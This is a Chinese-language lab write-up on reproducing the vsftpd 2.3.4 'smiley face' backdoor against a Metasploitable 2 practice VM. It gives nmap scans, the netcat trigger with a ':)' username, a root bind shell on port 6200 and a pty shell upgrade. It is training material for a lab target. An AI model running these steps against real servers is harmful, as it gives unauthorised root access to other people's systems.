实验笔记:vsftpd 2.3.4 笑脸漏洞复现
实验目标
复现 vsftpd 2.3.4 的"笑脸漏洞",通过该漏洞获取靶机的 root 权限。
实验环境
- 攻击机:Kali Linux
- 靶机:Metasploitable Linux 2.0.0
实验步骤
一、环境搭建
下载并启动靶机
- 下载 Metasploitable Linux 2.0.0 镜像文件。
- 解压后使用 VMware 打开并启动虚拟机。
登录靶机并修改 root 密码
使用普通用户
msfadmin登录,密码为msfadmin。修改 root 用户的密码:
1msfadmin@metasploitable:~$ sudo passwd root按提示输入新密码。
二、漏洞复现
端口扫描
在 Kali Linux 上打开终端,使用 nmap 扫描靶机的开放端口:
1nmap 192.168.xx.xx(将
192.168.xx.xx替换为靶机的实际 IP 地址)确认靶机开放了 21 (FTP) 端口。

扫描 FTP 服务版本
使用 nmap 扫描 FTP 服务的版本信息:
1nmap -sV 192.168.xx.xx确认靶机运行的是 vsftpd 2.3.4 版本。

触发漏洞
在 Kali Linux 上使用 Netcat (nc) 连接靶机的 21 端口:
1nc 192.168.xx.xx 21输入以下命令(注意手动输入):
1 2user mz:) pass aaaaa此时靶机的 6200 端口会自动开启。保持当前终端状态,不要关闭。

验证 6200 端口
在 Kali Linux 上另起一个终端,使用 nmap 扫描 6200 端口:
1sudo nmap -sS -p 6200 192.168.xx.xx确认 6200 端口已开启。

获取 root 权限
使用 Netcat 连接靶机的 6200 端口:
1nc 192.168.xx.xx 6200成功连接后,即可以 root 身份登录靶机。

注意:连接后执行ls查看是都已经进去半终端
确认进入半终端可执行python -c ‘import pty;pty.spawn("/bin/bash")’ 调用完整终端
三、实验注意事项
- 如果在实验过程中遇到问题,可以尝试重启靶机。
- 确保在触发漏洞后保持 Netcat 连接状态,否则 6200 端口可能会关闭。
实验总结: 本次实验通过 vsftpd 2.3.4 的"笑脸漏洞",成功获取了靶机的 root 权限。实验过程中,关键在于正确触发漏洞并保持 Netcat 连接状态,以确保后续操作的顺利进行。